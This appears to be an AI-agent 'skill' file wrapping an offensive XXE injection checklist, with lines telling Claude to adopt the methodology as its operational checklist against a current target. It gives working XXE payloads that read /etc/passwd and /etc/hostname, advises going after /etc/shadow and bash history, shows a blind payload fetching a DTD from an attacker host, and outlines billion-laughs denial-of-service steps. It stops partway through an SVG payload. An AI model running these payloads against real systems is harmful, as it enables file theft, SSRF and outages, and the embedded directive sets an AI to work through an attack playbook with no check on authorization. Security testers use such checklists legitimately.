SKILL: XML External Entity (XXE) Injection
Metadata
- Skill Name: xxe
- Folder: offensive-xxe
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/xxe.md
Description
XML External Entity injection testing checklist: classic XXE, blind XXE (out-of-band), XXE via file upload (SVG/docx), XXE in SOAP/REST, error-based XXE, XInclude attacks, and XXE filter bypass. Use for web app XXE testing and bug bounty.
Trigger Phrases
Use this skill when the conversation involves any of:
XXE, XML external entity, blind XXE, out-of-band XXE, XXE file upload, SVG XXE, SOAP XXE, XInclude, entity bypass, XXE SSRF, XXE file read
Instructions for Claude
When this skill is active:
- Load and apply the full methodology below as your operational checklist
- Follow steps in order unless the user specifies otherwise
- For each technique, consider applicability to the current target/context
- Track which checklist items have been completed
- Suggest next steps based on findings
Full Methodology
XML External Entity (XXE) Injection
Shortcut
- Find data entry points that you can use to submit XML data.
- Determine whether the entry point is a candidate for a classic or blind XXE. The endpoint might be vulnerable to classic XXE if it returns the parsed XML data in the HTTP response. If the endpoint does not return results, it might still be vulnerable to blind XXE, and you should set up a callback listener for your tests.
- Try out a few test payloads to see if the parser is improperly configured. In the case of classic XXE, you can check whether the parser is processing external entities. In the case of blind XXE, you can make the server send requests to your callback listener to see if you can trigger outbound interaction.
- Try to exfiltrate a common system file, like /etc/hostname.
- You can also try to retrieve some more sensitive system files, like /etc/shadow or ~/.bash_history.
- If you cannot exfiltrate the entire file with a simple XXE payload, try to use an alternative data exfiltration method.
- See if you can launch an SSRF attack using the XXE.
Mechanisms
XML External Entity (XXE) is a vulnerability that occurs when XML parsers process external entity references within XML documents. XXE attacks target applications that parse XML input and can lead to:
- Disclosure of confidential files and data
- Server-side request forgery (SSRF)
- Denial of service attacks
- Remote code execution in some cases
flowchart TD
A[XXE Vulnerability] --> B[File Disclosure]
A --> C[SSRF]
A --> D[Denial of Service]
A --> E[Remote Code Execution]
B -->|"Access to"| B1[System Files]
B -->|"Access to"| B2[Application Configs]
B -->|"Access to"| B3[Database Credentials]
C -->|"Access to"| C1[Internal Services]
C -->|"Access to"| C2[Cloud Metadata]
C -->|"Access to"| C3[External Resources]
D -->|"Via"| D1[Billion Laughs]
D -->|"Via"| D2[Quadratic Blowup]
D -->|"Via"| D3[External Resource DoS]
E -->|"Via"| E1[PHP Expect]
E -->|"Via"| E2[Java Deserialization]
XXE vulnerabilities arise from XML's Document Type Definition (DTD) feature, which allows defining entities that can reference external resources. When a vulnerable XML parser processes these entities, it retrieves and includes the external resources, potentially exposing sensitive information.
In practice, full remote code execution rarely stems from XXE alone; it typically requires language-specific gadgets—such as PHP's expect:// wrapper or Java deserialization sinks—which XXE merely helps reach.
sequenceDiagram
actor A as Attacker
participant C as Client
participant S as Server
participant X as XML Parser
participant FS as File System
A->>C: Craft malicious XML with XXE payload
C->>S: Submit XML document
S->>X: Pass XML for parsing
X->>FS: Resolve external entity reference
FS->>X: Return sensitive file content
X->>S: Include file content in parsed result
S->>C: Return response with sensitive data
C->>A: Attacker views sensitive data
Types of XXE attacks include:
- Classic XXE: Direct extraction of data visible in responses
- Blind XXE: No direct output, but data can be exfiltrated through out-of-band techniques
- Error-based XXE: Leveraging error messages to extract data
- XInclude-based XXE: Using XInclude when direct DTD access is restricted
flowchart LR
A[XXE Attack Types] --> B[Classic XXE]
A --> C[Blind XXE]
A --> D[Error-based XXE]
A --> E[XInclude-based XXE]
B -->|"Direct Output"| B1[Response contains file content]
C -->|"Out-of-Band"| C1[Data exfiltration via callbacks]
D -->|"Error Messages"| D1[Data in error output]
E -->|"XInclude"| E1[Alternative to DTD]
Hunt
Finding XXE Vulnerabilities
Additional Discovery Methods
- Convert content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml"
- Check file uploads that allow docx/xlsx/pdf/zip - unzip the package and add XML code into the XML files
- Test SVG file uploads for XML injection
- Check RSS feeds functionality for XML injection
- Fuzz for /soap API endpoints
- Test SSO integration points for XML injection in SAML requests/responses
Identify XML Injection Points
flowchart TD
A[XML Injection Points] --> B[API Endpoints]
A --> C[File Uploads]
A --> D[Format Conversion]
A --> E[Legacy Interfaces]
A --> F[Hidden XML Parsers]
A --> G[Content-Type Conversion]
B --> B1[REST APIs]
B --> B2[GraphQL]
C --> C1[XML Files]
C --> C2[DOCX/XLSX]
C --> C3[SVG Images]
C --> C4[PDF Files]
D --> D1[JSON to XML]
D --> D2[CSV to XML]
E --> E1[SOAP]
E --> E2[XML-RPC]
E --> E3[SAML]
F --> F1[Hidden Parameters]
F --> F2[Legacy Code]
G --> G1[JSON endpoints accepting XML]
- API Endpoints: Look for endpoints accepting XML data
- File Uploads: Features accepting XML-based files (DOCX, SVG, XML, etc.)
- Format Conversion: Services converting to/from XML formats
- Legacy Interfaces: SOAP web services, XML-RPC
- Hidden XML Parsers: Look for parameters that might be processed as XML behind the scenes
- Content Type Conversion: Endpoints that accept JSON but may process XML with proper Content-Type
Test Basic XXE Patterns
For each potential injection point, test with simple payloads:
-
Classic XXE (file retrieval):
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root>or
<!DOCTYPE ase [ <!ENTITY %test SYSTEM "http://sib.com/sib"> %test; ]> <example>&test;</example> -
Blind XXE (out-of-band detection):
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://attacker-server.com/malicious.dtd"> %xxe; ]> <root>test</root> -
XInclude attack (when unable to define a DTD):
<root xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/> </root>
Billion Laughs Attack Steps
- Capture the request in your proxy tool
- Send it to repeater and convert body to XML format
- Check the Accept header and modify to Application/xml if needed
- Convert JSON to XML if no direct XML input is possible
- Insert the billion laughs payload between XML tags
- Adjust entity references (lol1 to lol9) to control DoS intensity
Check Alternative XML Formats
-
SVG files:
<?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <text font-size="16" x="0" y="16">&xxe;</text> </svg>or